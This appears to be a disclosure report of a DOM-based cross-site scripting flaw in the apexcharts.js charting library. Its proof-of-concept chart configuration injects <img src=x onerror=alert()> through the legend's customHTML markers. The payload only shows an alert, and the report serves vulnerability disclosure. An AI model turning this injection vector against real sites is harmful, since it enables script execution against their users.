Cross-site Scripting (XSS) - DOM in apexcharts/apexcharts.js

Valid
Reported on May 17th 2021

✍️ Description

Last version of Apexcharts.js is vulnerable to Cross-Site Scripting (XSS)

🕵️‍♂️ Proof of Concept

Simply try one of the examples provided in samples/vanilla-js/scatter/scatter-images.html in this way:

<body>
     <div id="chart"></div>
    <script>
        var options = {
          series: [{
          name: 'Messenger',
          data: [
            [16.4, 5.4],
             .....
          ]
        }, {
          name: 'Instagram',
          data: [
            [6.4, 5.4],
            .....
          ]
        }],
          chart: {
          height: 350,
          type: 'scatter',
          animations: {
            enabled: false,
          },
          zoom: {
            enabled: false,
          },
          toolbar: {
            show: false
          }
        },
        colors: ['#056BF6', '#D2376A'],
        xaxis: {
          tickAmount: 10,
          min: 0,
          max: 40
        },
        yaxis: {
          tickAmount: 7
        },
        markers: {
          size: 20
        },
        fill: {
          type: 'image',
          opacity: 1,
          image: {
            src: ['../../assets/images/ico-messenger.png', '../../assets/images/ico-instagram.png'],
            width: 40,
            height: 40
          }
        },
        legend: {
          labels: {
            useSeriesColors: true
          },
          markers: {
            customHTML: [
              function() {
                return '<span><i class="fab fa-facebook"></i><img src=x onerror=alert()></span>'
              }, function() {
                return '<span><i class="fab fa-instagram"></i></span>'
              }
            ]
          }
        }
        };

        var chart = new ApexCharts(document.querySelector("#chart"), options);
        chart.render();
    </script>

The alert window defined in <img src=x onerror=alert()> appears when the html is loaded.

💥 Impact

Through this vulnerability, an attacker is capable to execute malicious scripts.